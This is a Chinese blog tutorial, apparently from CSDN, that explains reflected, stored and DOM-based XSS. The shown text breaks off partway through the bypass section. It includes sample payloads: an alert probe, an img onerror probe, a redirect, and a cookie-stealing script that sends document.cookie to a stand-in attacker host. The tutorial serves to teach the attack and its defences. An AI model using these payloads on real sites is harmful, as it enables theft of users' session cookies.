web漏洞之XSS

本文详细介绍了XSS(跨站脚本攻击)的三种类型:反射型、存储型和DOM型XSS,包括攻击原理、方法、绕过手段、防御策略以及可能的危害,旨在帮助读者深入理解XSS攻击并提升网站安全性。
摘要由CSDN通过智能技术生成

目录

 

一 、XSS概述

1.1分类

二、反射型XSS

2.1攻击原理

2.2攻击方法

2.3绕过方法

2.4防御方法

2.5危害

三、存储型XSS

3.1攻击原理

3.2攻击方法

3.3绕过方法

3.4防御方法

3.5危害

四、DOM型XSS

4.1原理

4.2攻击方法

4.3防御方法

4.4危害


一 、XSS概述

       XSS是跨站脚本攻击(Cross Site Scripting),恶意攻击者往Web页面里插入恶意HTML语句或Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的

1.1分类

       XSS可以根据是否和后端或数据库交互分为两大类:持久性XSS(存储型)和非持久性XSS(反射型)

       反射型XSS:这种类型的XSS通常是一个页面(URL),它的攻击往往是一次性的,当被攻击者访问这个页面时,恶意代码就会被执行,从而达到攻击者的目的(弹cooking、页面劫持、钓鱼等)

       存储型XSS:这种xss用起来更为简单,攻击者的恶意语句和脚本会存储在服务器上面数据库中攻击行为将伴随着攻击数据一直存在。

       DOM型XSS:由于HTML页面中,定义了一段JS,根据用户的输入,显示一段 HTML 代码,攻击者 可以在输入时,插入一段恶意脚本,最终展示时,会执行恶意脚本。

二、反射型XSS

2.1攻击原理

  它通过我们给没有做任何防护或者防护不严格的网站插入html标签或script脚本来构造攻击页面,后端将解析后的页面和URL发送给攻击者,攻击者将URL发送给被害者,当URL地址被打开时,特有的恶意代码参数被HTML解析、执行。它的特点是非持久化,必须用户点击带有特定参数的链接才能引起

2.2攻击方法

       1.确认是否存在xss:<script>alert(“xss”);</script>或者<img src='111' οnerrοr='alert("xss")'>

       2.弹cooking:var i=document.createElement("img");

        document.body.appendChild(i);

        i.src = "http://www.hackerserver.com/?c=" + document.cookie;

       3.页面跳转:<script>window.location.href="http://www.baidu.com";</script>

2.3绕过方法

       1.大小写关键字,复写等简单方法。比如:<

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值